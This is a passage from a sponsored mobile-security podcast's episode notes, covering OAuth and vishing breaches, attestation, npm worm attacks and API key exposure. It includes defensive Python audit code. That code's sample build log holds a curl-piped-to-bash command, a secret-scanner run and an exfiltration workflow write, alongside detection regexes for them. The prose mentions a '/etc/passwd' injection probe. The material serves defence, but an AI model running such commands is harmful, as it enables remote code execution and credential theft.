    The 2025 OAuth and Vishing Wave. The episode also examines ShinyHunters' 2025 campaign targeting mobile and web-based enterprise applications, particularly those connected to Salesforce and integrated platforms like Salesloft and Drift. These attacks were characterized by sophisticated social engineering and voice phishing ("vishing"), in which attackers impersonated IT staff (sometimes using AI-generated voices) to persuade employees to authorize malicious versions of Salesforce tools via mobile or web apps. With the resulting OAuth tokens, ShinyHunters read sensitive internal APIs and data at high-profile victims, including Google, Cloudflare, Qantas, Allianz Life, and Adidas. Analysts noted that these techniques bypassed technical controls by abusing human trust, enabling the theft of over 1.5 billion Salesforce records from approximately 760 organizations. A connected app authorized by a tricked employee inherits that employee's data access, and its bearer token is not re-challenged by MFA on later API calls, which is why connected-app allow-listing and prompt token revocation, not only user authentication, decide the blast radius. These incidents underscore that modern mobile application security is deeply dependent on robust cloud and OAuth ecosystem safeguards.

    Sponsor: This episode of Upwardly Mobile is brought to you by approov.io, helping protect your mobile API access and application endpoints from sophisticated attacks, including those using stolen OAuth tokens. Sponsor Link: approov.io

    Keywords: ShinyHunters, Cyber Extortion, Ransomware, Legacy System Vulnerability, OAuth Exploitation, Vishing, Voice Phishing, Salesforce Security, Checkout.com, Cybercrime Research, Cloud Security, Supply Chain Attack, Mobile Application Security, Digital Economy Security, Data Breach.

    Relevant Source Materials and Links
    Checkout.com's official statement on the incident concerning a legacy system and their decision not to pay the ransom, authored by Mariano Albera.
    ShinyHunters Salesforce Cyberattacks via Vishing and OAuth Exploitation
    The Hacker News: Why the ShinyHunters Data Breach vs. SaaS highlights vulnerabilities
    TrueSec: Cyber extortion group ShinyHunters targets Salesforce customers
    CM Alliance: Reports on major cyberattacks and data breaches in September 2025
    EclecticIQ: Analysis of ShinyHunters, a financially motivated data extortion group targeting enterprise cloud applications
    ReSecurity: Examining the alliance of threat actors and their global cybercrime spree
    Obsidian Security: The merger of chaos between ShinyHunters and Scattered Spider in the 2025 Salesforce attacks
    Cysecurity News: Coverage of ShinyHunters' voice phishing attacks
    ReliaQuest: Threat spotlight on ShinyHunters targeting Salesforce amid collaboration with Scattered Spider
    CloudProtection: Reporting on Salesforce attacks in 2025
    PKWARE: Recent Data Breaches

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.

  23. 100

    The Edge Advantage: Why Cloudflare and Approov Outpace Zscaler in API Security?

    Remote Attestation vs. RASP: Securing Mobile APIs at the Edge (Zscaler vs. Approov/Cloudflare)

    On this episode of Upwardly Mobile, we dive deep into the most critical architectural debate in mobile API security today: does security enforcement belong on the client device (RASP) or off-device at the network edge (remote attestation)? We break down the philosophical and technical differences between the integrated Zscaler ZSDK approach, which bundles Runtime Application Self-Protection (RASP), and the specialized, edge-native partnership between Approov and Cloudflare. Discover why security experts argue that, because the attacker ultimately controls the client environment, remote attestation is the stronger defense against sophisticated, targeted attacks.

    Episode Highlights & Key Concepts

    The Philosophical Divide: RASP vs. Remote Attestation. The core of the debate is where the security decision logic lives and how well it is insulated from the attacker.
    RASP (Runtime Application Self-Protection): Implements security logic within the application code to detect threats locally at runtime; commonly used for real-time overlay fraud, app tampering, and emulator abuse detection.
    The Risk: Any locally enforced logic is a target for advanced adversaries. Attackers can reverse-engineer RASP checks, patch or hook them out, and then issue API requests from a tampered application instance that still looks healthy to itself.
    Remote Attestation (Approov/Cloudflare): Verifies that only a genuine, untampered app can access APIs, protecting backend systems from unauthorized or rogue applications. The client still collects integrity measurements, but the pass/fail decision and the resulting token are produced by the attestation service, not by code the attacker can read and patch on the device.
    Superior Resilience: Approov's architecture minimizes local enforcement, so attestation decisions are made entirely in the cloud service. This insulates the enforcement logic on the backend and offers stronger resilience against sophisticated, targeted attacks.
    Zero Feedback Loop: A key security advantage is that the attacker receives no feedback from the client on why token validation failed at the edge, which raises the cost and complexity of engineering a bypass. A backend that honours this returns the same generic rejection for a missing, malformed, expired or badly signed token and keeps the specific reason in its own logs.

    Architectural and Operational Advantages. The comparison between the integrated Zscaler Zero Trust Exchange (ZTNA/SSE) model and the Approov/Cloudflare edge-first (WAAP) model highlights major differences in deployment, performance, and operational cost.
    Enforcement Location and TCO: The Approov/Cloudflare model enforces entirely at the Cloudflare edge, in a Worker or through API Shield's JWT validation, with no customer-managed infrastructure. This is described as a zero-operations deployment model that removes components like Zscaler's required App Connectors, accelerating time-to-value and minimizing maintenance overhead.
    API Key Protection: Approov uses the attestation guarantee to deliver secrets such as API keys just in time to the application, only when the environment is verified as genuine and unmodified. This directly mitigates the risk of reverse engineering hard-coded keys.
    Performance and Scale: The Cloudflare/Approov integration leverages Cloudflare's global, high-performance network. Comparative tests show Cloudflare is significantly faster than Zscaler in various Zero Trust scenarios, a crucial factor for a smooth user experience and for ensuring users do not work around security controls. Approov also offers a commercial attestation fabric built for scale, with no quotas or throttling on attestation traffic for high-volume apps.
    API Governance: Cloudflare API Shield adds positive security through OpenAPI schema validation at the edge, accepting only traffic that conforms to the documented API structure. This narrows the attack surface for risks like Broken Object Level Authorization (BOLA), with one caveat a practitioner should keep in mind: schema validation checks shape, not ownership, so a syntactically valid request for another user's object ID still has to be authorized by the backend.

    Secure Your Mobile APIs with the Industry's Leading Attestation Solution. This episode is proudly brought to you by Approov, the definitive solution for continuous and deterministic mobile app attestation. Approov ensures that only genuine, untampered instances of your mobile application can access your backend APIs, protecting against bot attacks, API abuse, and sophisticated tampering. Learn how to deploy mobile API security today: 🔗 https://approov.io/

    Keywords: Mobile API Security, Remote Attestation, RASP, Approov, Cloudflare, Zscaler, API Integrity, Mobile App Protection, Zero Trust Architecture, Edge Security, API Abuse Prevention, Serverless Security, JWT Attestation, Mobile Bot Mitigation, Cloudflare Workers, App Attestation.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.

  24. 99

    App Store Revolution: Google Play Opens to Third-Party Payments (The Epic Games Aftermath)

    Upwardly Mobile: Episode Notes

    Episode Title: App Store Revolution: Google Play Opens to Third-Party Payments (The Epic Games Aftermath)

    Summary: In this episode of Upwardly Mobile, we break down the monumental shift in the Android ecosystem following the Supreme Court's refusal to hear Google's final appeal. Google has opened its Google Play app store to third-party payment options for U.S. developers, settling a multi-year legal battle initiated by Epic Games. We discuss what this means for developers seeking to maximize revenue, the new freedom to direct users to cheaper external payment options, and the resulting challenges in maintaining app integrity and security now that developers are operating outside Google Play Billing exclusivity. We also explore security solutions, like Approov, that can help developers protect their apps when relying less on Google Mobile Services (GMS) for integrity checks.

    Key Takeaways
    Policy Shift: Following years of legal challenges, Google is now required to allow U.S. app developers to use alternative payment methods and link users directly to external payment sources. Developers can process payments outside Google's ecosystem and inform users about alternative pricing.
    End of Exclusivity: Previously, Google generally mandated the use of Google Play Billing and collected a commission on nearly every in-app purchase. Now developers can provide direct links to external checkout pages and offer options like PayPal or their own payment systems.
    Timeline and Scope: The change took effect immediately on October 29, 2025. The new rules currently apply only in the U.S., and the District Court order is set to expire on November 1, 2027.
    Security Challenges: While developers gain freedom and potential revenue by avoiding Play Store commissions, distributing and processing payments externally requires implementing their own robust security, update, and analytics systems, as Play services such as integrity verification may not be available. In practice, a purchase completed on an external checkout page has to be confirmed server to server with the payment provider, and the entitlement granted only after that confirmation, because the app itself can be modified to claim a purchase it never made.
    App Attestation Alternative: For developers building non-GMS Android apps or those seeking customizable security outside Google's structure, Approov provides app attestation, verifying the integrity and authenticity of an app and the device it runs on, without relying on Google Play Integrity or the now-retired SafetyNet Attestation API.

    Sponsored by Approov: Protect your app and APIs regardless of your payment processing choices. Approov offers runtime protection and serves as a reliable, GMS-independent alternative to Google Play Integrity for app attestation and real-time threat detection. Learn more or start a free trial today: approov.io

    Relevant Links & Resources
    Google Opens App Store to Third-Party Payment Systems (PaymentsJournal): https://www.paymentsjournal.com/google-opens-app-store-to-third-party-payment-systems/
    Google Play now allows Android apps to use other billing systems in the US (9to5Google): https://9to5google.com/2025/10/30/google-play-now-allows-android-apps-to-use-other-billing-systems-in-the-us/
    How Organizations Can Chart the Course to Agentic Commerce (Must Read): [Relevant link to PaymentsJournal content on commerce] (October 31, 2025)

    Keywords: Google Play, third-party payments, Epic Games, app store, commission, app security, app attestation, Approov, U.S. court ruling, Google Play Billing, non-GMS apps, developer revenue, digital payments, emerging payments, API security.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.

  25. 98

    NPM Nightmare: Cloudflare AI That Secured End Users From 2 Billion Weekly Malicious Downloads

    The Billion-Download Backdoor: Defending Client-Side Supply Chains Against Crypto-Draining NPM Attacks

    Episode Notes

    In early September 2025, the open-source software ecosystem faced a massive supply chain attack when attackers compromised trusted maintainer accounts on npm using targeted phishing emails. The breach led to the injection of malicious code into 18 widely used npm packages, including chalk, debug, and ansi-styles, which together account for more than 2 billion downloads per week. This episode dives into the mechanics of the attack, the threat posed by the malware deployed, and the role of AI-powered defenses in preventing client-side disaster.

    Key Takeaways

    The Threat Landscape: The attackers' primary goal was crypto-stealing, or wallet draining. The compromised packages contained obfuscated JavaScript which, when bundled into end-user applications (web projects as well as mobile apps built with frameworks like React Native or Ionic), ran in the browser or web view. The malware hooked network traffic and API requests and swapped legitimate cryptocurrency addresses (Bitcoin, Ethereum, Solana and others) for the attackers' wallets. The attack leveraged the human factor: maintainers were tricked by phishing emails urging them to update two-factor authentication credentials via a fake domain, npmjs[.]help.

    The Evolution of Malware: Shai-Hulud. Beyond crypto-hijacking, researchers detected a self-replicating worm dubbed Shai-Hulud in a second wave of npm compromises about a week later. This payload targets development and CI/CD environments rather than end users:
    • Autonomous Propagation: Shai-Hulud uses the npm tokens it finds on an infected machine to publish trojanized versions of that maintainer's other packages, infecting additional projects without further human action.
    • Credential Theft: Using stolen GitHub access tokens, the worm lists and clones private repositories to attacker-controlled accounts.
    • Secret Harvesting: It downloads and runs the secret-scanning tool TruffleHog to harvest secrets, keys, and high-entropy strings from the compromised environment.
    • Malicious Workflows: Shai-Hulud establishes persistence by injecting malicious GitHub Actions workflows into repositories, enabling automated secret exfiltration.

    Automated Defense with AI Security: Cloudflare's client-side security offering, Page Shield, proved critical in mitigating this threat. Page Shield assesses 3.5 billion scripts per day (40,000 scripts per second) using machine-learning-based malicious script detection.
    • Page Shield uses a message-passing graph convolutional network (MPGCN). This graph-based model learns attacker patterns from the structure (for example, function-call relationships) and syntax of the code, which makes it resilient to the code obfuscation used in the npm compromise.
    • Cloudflare verified that Page Shield would have detected all 18 compromised npm packages as malicious, despite the attack being novel and absent from the initial training data.
    • While patches were released quickly (in 2 hours or less), Page Shield was already equipped to detect and block this threat, helping users "dodge the proverbial bullet".

    Security Recommendations. To protect against fast-moving supply chain attacks, organizations must maintain vigilance and implement automated defenses:
    1. Audit Dependencies: Review your dependency tree, checking for versions published around early to mid September 2025. Pin dependencies to known-good versions and verify the lockfile's integrity hashes and registry sources.
    2. Rotate Credentials: Immediately revoke and reissue any exposed CI/CD tokens, cloud credentials, or service keys that might have been used in the build pipeline.
    3. Enforce MFA: Tighten access policies and enforce multi-factor authentication (MFA) on all developer and CI/CD access points. The maintainers in this incident were phished for their 2FA details, so prefer phishing-resistant methods (hardware keys or passkeys) over codes that can be relayed through a fake site.
    4. Proactive Monitoring: Monitor build logs and environments for signs of suspicious scanning activity, such as the use of TruffleHog, and for workflow files or package publishes that the pipeline did not expect.

    🔗 Relevant Links and Resources
    • Cloudflare: How Cloudflare's client-side security made the npm supply chain attack a non-event
      ◦ Cloudflare Page Shield Script detection
    • Trend Micro Research: What We Know About the NPM Supply Chain Attack
    • Kaspersky Blog: Popular npm packages compromised

    🛡️ Sponsor: This episode of Upwardly Mobile is brought to you by our friends at approov.io.

    Keywords: NPM supply chain attack, Cloudflare Page Shield, Shai-Hulud worm, Cryptohijacker, crypto-stealing malware, client-side security, JavaScript obfuscation, open-source security, dependency audit, CI/CD security, phishing attack, MPGCN, machine learning security, developer accounts compromise, npm packages, software security.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.
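The audit and monitoring steps in the recommendations above, as an added example that is not part of the episode notes and not tooling from Cloudflare, Trend Micro or Kaspersky. It assumes a lockfileVersion 3 package-lock.json and a plain-text CI log; the manifest, lockfile and log lines are constructed for the example, the watchlist holds only the three package names the notes mention, and the version numbers are placeholders rather than the versions that were actually trojanized.

```python
"""Supply-chain audit helpers for an npm project (added example, not code from
the episode or from Cloudflare, Trend Micro or Kaspersky). The manifest,
lockfile and CI log are constructed; the watchlist holds the three package
names the notes mention (the advisory covered 18) and the versions are
placeholders, not the versions that were actually trojanized."""
import json
import re

WATCHLIST = {"chalk", "debug", "ansi-styles"}
EXPECTED_REGISTRY = "https://registry.npmjs.org/"
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")

# Constructed package.json: two pinned specs, three floating ones.
PACKAGE_JSON = json.loads("""{
  "name": "example-shop",
  "dependencies": {"chalk": "5.3.0", "debug": "^4.3.4",
                   "ansi-styles": "~6.2.1", "left-pad": "1.3.0"},
  "devDependencies": {"eslint": "latest"}
}""")

# Constructed lockfileVersion 3 excerpt: ansi-styles lacks an integrity hash,
# eslint resolves to a non-registry host, and left-pad is missing entirely.
PACKAGE_LOCK = json.loads("""{
  "name": "example-shop", "lockfileVersion": 3,
  "packages": {
    "": {"name": "example-shop"},
    "node_modules/chalk": {"version": "5.3.0", "integrity": "sha512-placeholder",
      "resolved": "https://registry.npmjs.org/chalk/-/chalk-5.3.0.tgz"},
    "node_modules/debug": {"version": "4.4.1", "integrity": "sha512-placeholder",
      "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz"},
    "node_modules/ansi-styles": {"version": "6.2.1",
      "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz"},
    "node_modules/eslint": {"version": "9.0.0", "integrity": "sha512-placeholder",
      "resolved": "https://mirror.example.internal/eslint-9.0.0.tgz"}
  }
}""")

# Constructed CI log excerpt; timestamps and commands are invented.
BUILD_LOG = """\
[12:01:03] npm ci --ignore-scripts
[12:01:40] > postinstall: node install-helper.js
[12:01:41] curl -fsSL https://example.invalid/setup.sh | bash
[12:01:52] trufflehog filesystem /home/runner --json
[12:01:58] git add .github/workflows/exfil.yml
[12:02:00] npm publish --access public
[12:02:05] Build finished
"""


def is_pinned(spec: str) -> bool:
    """True only for an exact semver; ^, ~, *, ranges, tags and 'latest' float."""
    return bool(EXACT_VERSION.match(spec.strip()))


def audit_dependencies(manifest, lock, watchlist=WATCHLIST, registry=EXPECTED_REGISTRY):
    """Return (package, issue) pairs: floating specs, watchlisted names, missing
    lock entries, missing integrity hashes and off-registry tarball sources."""
    declared = {}
    for section in ("dependencies", "devDependencies"):
        declared.update(manifest.get(section, {}))
    packages = lock.get("packages", {})
    findings = []
    for name, spec in sorted(declared.items()):
        if not is_pinned(spec):
            findings.append((name, f"floating spec {spec!r}; pin an exact known-good version"))
        entry = packages.get(f"node_modules/{name}")
        if entry is None:
            findings.append((name, "declared but absent from lockfile"))
            continue
        if name in watchlist:
            findings.append((name, f"on watchlist; check resolved {entry.get('version')} against the advisory"))
        if "integrity" not in entry:
            findings.append((name, "lock entry has no integrity hash"))
        if not entry.get("resolved", "").startswith(registry):
            findings.append((name, f"resolved from unexpected source {entry.get('resolved')}"))
    return findings


# Heuristics for the worm behaviour the notes describe: a secret scanner run
# inside the build, a workflow file written during the build, an unexpected
# publish, plus the generic curl-to-shell pattern.
SUSPICIOUS = [
    (re.compile(r"\btrufflehog\b", re.I), "secret scanner executed inside build"),
    (re.compile(r"\.github/workflows/\S+\.ya?ml"), "workflow file written during build"),
    (re.compile(r"\bnpm publish\b"), "package publish from a build step"),
    (re.compile(r"\bcurl\b[^|]*\|\s*(?:ba)?sh\b"), "remote script piped to a shell"),
]


def scan_build_log(text: str):
    """Return (line_number, label) for every log line matching a heuristic."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, label in SUSPICIOUS:
            if pattern.search(line):
                hits.append((lineno, label))
    return hits
```

Run `audit_dependencies(PACKAGE_JSON, PACKAGE_LOCK)` against a real project's files and the floating specs, missing integrity hashes and off-registry tarballs are the lines to act on first; a watchlist hit is a prompt to compare the resolved version with the advisory, not a verdict on its own. The log heuristics are deliberately coarse and will need tuning to a pipeline that legitimately publishes or runs a secret scanner, which is why each one carries a label rather than a score.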

  26. 97

    The Unseen Storm: Securing APIs and Protecting Against Key Exposure

    The Unseen Storm: Securing APIs and Protecting Against Key Exposure

    This week on Upwardly Mobile, we delve into the hidden dangers lurking in seemingly simple applications and the solutions required to close the modern mobile security trust gap. We analyze a case study involving a basic weather application to illustrate how common development mistakes, like exposing API keys and neglecting input validation, create serious security vulnerabilities that can lead to data breaches, financial loss, and system compromise.

    The Problem: Client-Side Secrets and Architectural Flaws. The proliferation of web applications consuming public APIs has vastly expanded the attack surface. Developers often treat the client environment as trusted, which leads to architectural failures. API keys embedded in client-side JavaScript are "low-hanging fruit" for attackers: anything shipped to the browser or packaged in an app binary should be assumed readable by whoever runs it.

    Key Takeaways from the Security Analysis:
    Reconnaissance and Exploitation: Attackers can use tools like curl and grep with regular expressions to scan target URLs for hardcoded API key patterns. Once obtained, keys can be used for unauthorized calls, exceeding quotas and incurring costs for the key's owner.
    Interception: Tools like Burp Suite let attackers intercept and modify API traffic, revealing the exact structure of API calls, including the API key and parameters.
    Injection Attacks: Poor input sanitization on server-side search functionality is a primary attack vector. We examine command snippets used to test for command injection (e.g., appending cat /etc/passwd to a parameter) and NoSQL injection (e.g., using MongoDB operator syntax in a query value).
    Lateral Movement: An exposed API key is often just the beginning. If the key has excessive permissions, it can allow an attacker to enumerate IAM policies, look for sensitive S3 buckets, and even create persistent administrative users, leading to a full cloud account takeover.

    Defensive Fundamentals for Developers. To counter these threats, security must be shifted left and integrated into the earliest stages of development. We review critical defensive measures:
    Environment Variable Security: API keys must never be exposed to the client; they belong in server-side configuration such as environment variables or a secrets manager. The client requests data from your own server endpoint, which fetches the data from the third-party API using the key the client never sees.
    Rate Limiting: To protect backend APIs from abuse and Denial-of-Wallet attacks (attacks whose aim is to run up your bill), rate-limiting middleware such as express-rate-limit is essential. It slows automated scripts by limiting each IP to a set number of requests within a time window. Per-IP limits are a floor, not a ceiling: a bot fleet spreads its requests across many addresses and legitimate users behind carrier-grade NAT share one, so limits keyed on an authenticated app or user identity should sit on top.
    Cloud Hardening: Security extends to infrastructure. Audit cloud resources, check S3 bucket policies for leaks, and ensure EC2 security groups only allow necessary web traffic (ports 80 and 443).

    Closing the Mobile API Security Trust Gap with Positive Authentication. While these fundamentals are crucial, mobile app security introduces unique challenges, creating a concerning "trust gap". Traditional measures like TLS, mutual TLS, embedded API keys, and signature-based approaches are often insufficient, because the material they depend on ships inside the app and is exposed to reverse engineering, MitM and spoofing. We discuss Approov, a solution designed for the mobile world that uses a positive trust model to authenticate the app instance itself rather than just the user or the connection.
    App Attestation: Approov uses a challenge-response cryptographic protocol to dynamically measure the integrity of the running app.
    Tokens (JWT): Only genuine, untampered apps are granted a short-lived JSON Web Token (JWT). Requests without a valid token are rejected by the backend API.
    Protection against Reverse Engineering: Because the system does not rely on static secrets embedded in the app, traditional reverse engineering techniques are ineffective. Approov also provides a runtime secrets protection capability, allowing developers to remove third-party API keys from the app package entirely and substitute them just in time for the API call, after the app has passed attestation.
    Benefits: This positive authentication model blocks sophisticated bots, automated scraping systems, and repackaged apps, ensuring that only registered, authentic versions of your application can access your digital assets.

    Links & Resources
    Source Material Reference:
    Excerpts from "The Unseen Storm: How A Simple Weather App Exposes Critical API Security Flaws - Undercode Testing"
    Excerpts from "WP-How Approov Addresses the Security Trust Gap"
    Sponsor: Learn how Approov protects your revenue and business data by deploying Mobile Security: approov.io

    Keywords: API security, mobile security, API key protection, reverse engineering, input validation, client-side vulnerabilities, app attestation, JWT, zero-trust architectures, rate limiting, cloud security, Denial-of-Wallet, Man-in-the-Middle (MitM), Burp Suite, Approov.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.
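The backend side of what this episode describes, combined with the rule from the remote attestation episode earlier on this page that a failed token check gives the caller no feedback, as an added example that is not part of the episode notes and not Approov's or Cloudflare's code. It shows a server endpoint that rejects requests lacking a valid short-lived HS256 token, rate-limits per client, allow-lists the user-supplied parameter before it reaches anything upstream, and keeps the third-party weather key on the server. The shared secret, the X-Attestation-Token header name and the WEATHER_API_KEY variable are assumptions invented for the example, and the token issuer is included only so the example can build its own inputs.

```python
"""Backend gate for a short-lived attestation token, with per-client rate
limiting and a third-party key that stays on the server. Added example, not
code from the episode, from Approov or from Cloudflare. It assumes an HS256
secret shared between the attestation service and this backend, a header named
X-Attestation-Token and a WEATHER_API_KEY environment variable; all three
names are invented for the example."""
import base64
import hashlib
import hmac
import json
import os
from collections import defaultdict, deque

ATTESTATION_SECRET = b"constructed-demo-secret-do-not-use"  # assumption, see above
TOKEN_HEADER = "X-Attestation-Token"                         # assumption
UPSTREAM = "https://weather.example/v1/current"              # placeholder URL


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_claims(claims: dict) -> str:
    return b64url_encode(json.dumps(claims, separators=(",", ":")).encode())


def issue_token(claims: dict, secret: bytes = ATTESTATION_SECRET) -> str:
    """What the attestation service would return after a passing attestation;
    present only so the example can build its own inputs."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = encode_claims(claims)
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_token(token: str, now: float, secret: bytes = ATTESTATION_SECRET):
    """Return (claims, None) for a genuine, unexpired token, else (None, reason)."""
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed"
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(body_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None, "undecodable"
    if header.get("alg") != "HS256":  # pin the algorithm; never let the token choose
        return None, "unexpected alg"
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):  # constant-time comparison
        return None, "bad signature"
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or now >= exp:
        return None, "expired"
    return claims, None


class SlidingWindowLimiter:
    """At most `limit` requests per key within the trailing `window` seconds."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self._hits = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self._hits[key]
        while q and q[0] <= now - self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def build_upstream_request(city: str) -> dict:
    """The server, not the app, holds the third-party key; it never leaves here."""
    key = os.environ.get("WEATHER_API_KEY", "constructed-server-side-key")
    return {"url": UPSTREAM, "params": {"q": city, "appid": key}}


def gate(request: dict, limiter: SlidingWindowLimiter, now: float,
         secret: bytes = ATTESTATION_SECRET):
    """Decide one request; returns (status, public_body, audit_reason).
    Every rejection carries the same generic body so the caller learns nothing
    about which check failed; the precise reason is for server-side logs only.
    `request` is a plain dict standing in for a framework request object."""
    if not limiter.allow(request.get("ip", "unknown"), now):
        return 429, {"error": "too many requests"}, "rate limited"
    token = request.get("headers", {}).get(TOKEN_HEADER)
    if token is None:
        return 401, {"error": "unauthorized"}, "no attestation token"
    claims, reason = verify_token(token, now, secret)
    if claims is None:
        return 401, {"error": "unauthorized"}, f"token rejected: {reason}"
    city = request.get("query", {}).get("city", "")
    if not city.isalpha() or len(city) > 64:  # allow-list input before it goes anywhere
        return 400, {"error": "bad request"}, "city failed validation"
    # A real handler now performs build_upstream_request(city) and relays the result.
    return 200, {"city": city}, f"ok app={claims.get('sub')}"
```

Two design choices carry the security weight. The algorithm is fixed to HS256 on the server rather than read from the token, which closes the `alg: none` and key-confusion bypasses, and the signature is compared in constant time. The `gate` function returns the same `unauthorized` body whether the token is absent, forged, expired or undecodable, so an attacker probing the endpoint cannot tell which check tripped; the distinguishing reason is returned separately for the server's own log line.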

  27. 96

    UK Competition and Markets Authority (CMA) designate Apple and Google with Strategic Market Status

    UK CMA Declares Apple & Google Have Strategic Market Status (SMS): The Future of Mobile Competition and Security

    In this pivotal episode of "Upwardly Mobile," we break down the monumental decision by the UK Competition and Markets Authority (CMA) to officially designate Apple and Google with Strategic Market Status (SMS) in their respective mobile platforms. This move is set to reshape digital markets across the UK and has massive implications for app developers, businesses, and mobile security worldwide.

    Key Takeaways from the CMA's Decision (Published 22 October 2025):
    The CMA launched its investigations in January 2025 under the Digital Markets, Competition and Consumers Act 2024 (DMCCA), aiming to address the "unprecedented market power" held by a few large digital firms.
    SMS Designation Confirmed: Following consultation with over 150 stakeholders, the CMA confirmed that both Apple and Google meet the legal tests for having Substantial and Entrenched Market Power (SEMP) and a Position of Strategic Significance (POSS) in their mobile platforms.
    Scope of Mobile Platforms: The designation applies to the holistic Mobile Platform provided by each company, grouping together highly interconnected digital activities:
      Apple: Smartphone Operating System (iOS), Tablet Operating System (iPadOS), Native App Distribution (App Store), and Mobile Browser and Browser Engine (Safari and WebKit).
      Google: Mobile Operating System (Android), Native App Distribution (Play Store), and Mobile Browser and Browser Engine (Chrome and Blink).
    Market Dominance: CMA findings confirmed that almost all UK mobile device holders use either Apple or Google's platform. Users are unlikely to switch between them, reinforcing their dominance. Furthermore, to reach both user bases, businesses must distribute their content through both platforms, effectively making them "must-have" channels.
    Market Entrenchment: The CMA concluded that competitive constraints are currently limited. Despite the rapid deployment of technologies like Artificial Intelligence (AI), these developments are deemed unlikely to eliminate Apple or Google’s market power over the five-year designation period.
    Economic Impact: The designation acknowledges the crucial role of these platforms, noting that the UK app economy generates an estimated 1.5% of the UK’s GDP and supports about 400,000 jobs, encompassing sectors like FinTech and mobile gaming.

    What Happens Next?
    The SMS designation itself is not a finding of wrongdoing and does not introduce immediate new requirements. However, it acts as the gateway for the CMA to introduce targeted and proportionate interventions, such as Conduct Requirements or Pro-Competition Interventions, designed to ensure open choices, fair dealing, and trust and transparency within these vital digital activities. This action mirrors regulatory efforts globally, including the EU’s Digital Markets Act (DMA) and legal actions in the US and Japan.

    🎧 Sponsored by Approov
    We are entering a "pivotal era for mobile technology" where regulatory interventions like the CMA’s SMS designation and the EU's DMA are weakening the centralized control over app distribution held by Apple and Google. This shift "opens the floodgates for alternative app stores, sideloading, and direct-to-consumer models". As mobile security risks move beyond platform constraints, secure your applications and APIs with a truly cross-platform, developer-centric solution. Visit approov.io for more information on how to implement modern app and API protection.

    🔗 Useful Links & Resources
    CMA Final Decision on Apple’s Mobile Platform (22 October 2025): [www.gov.uk/cma]
    CMA Final Decision on Google’s Mobile Platform (22 October 2025): [www.gov.uk/cma]
    CMA Press Release: CMA confirms Apple and Google have strategic market status in mobile platforms: [www.gov.uk/cma]

    💡 Keywords: CMA, Strategic Market Status (SMS), Digital Markets Competition and Consumers Act 2024 (DMCCA), Apple Mobile Platform, Google Mobile Platform, mobile platform, app distribution, mobile browser, mobile security, iOS, Android, App Store, Play Store, WebKit, Blink, API protection, sideloading, app economy, tech regulation.

  28. 95

    F5's Zero-Day Roadmap and the Unacceptable Risk to Mobile Apps & APIs

    API Security Under Fire: F5's Zero-Day Roadmap and the Unacceptable Risk to Mobile Apps

    The F5 BIG-IP Breach and What It Means for Developers
    This week on Upwardly Mobile, we dive into the fallout from the catastrophic security breach at F5 Networks, where a sophisticated nation-state adversary compromised the integrity of the critical BIG-IP product line. We discuss why this incident poses an imminent and unacceptable risk to organizations—especially mobile app developers who rely on F5 devices for critical API security infrastructure like load balancing and firewalling.

    The Compromise: Source Code, Credentials, and Zero-Day Roadmaps
    The threat actor maintained long-term, persistent access to F5’s internal systems, specifically the BIG-IP product development environment and engineering knowledge platforms. This sophisticated attack led to the theft of crucial materials:
    Proprietary Source Code: Portions of the proprietary source code for the flagship BIG-IP product line were exfiltrated. While F5 confirmed the actor did not inject malicious code, possessing the source code allows adversaries to analyze it for vulnerabilities or backdoor opportunities.
    Vulnerability Roadmap: Attackers gained access to internal documentation detailing undisclosed (zero-day) vulnerabilities that F5 engineers were investigating or fixing. This provides the adversaries with a virtual roadmap, enabling them to rapidly develop exploits for unpatched flaws.
    Customer Configuration Data: A small portion of customer-specific data was stolen, including network topologies, device configurations, or deployment details. For developers managing mobile APIs, this stolen information increases the risk that sensitive credentials can be abused and attackers can target specific deployment setups.

    Urgent Action Required: The CISA Emergency Directive
    The severity of the incident prompted the Cybersecurity and Infrastructure Security Agency (CISA) to issue an Emergency Directive for federal agencies, underscoring the potential for widespread exploitation. Developers and organizations using F5 devices must take immediate action:
    Patch Immediately: Install the latest security updates, particularly the Quarterly Security Notification F5 released simultaneously, which addressed 44 new vulnerabilities.
    Isolate Management Interfaces: Identify all F5 resources and, critically, isolate management interfaces from the internet to prevent initial access and investigate any exposure.
    Adopt Zero Trust: Implement a zero trust architecture to reduce the attack surface and block lateral movement. Prioritize connecting users directly to applications, not the underlying network.
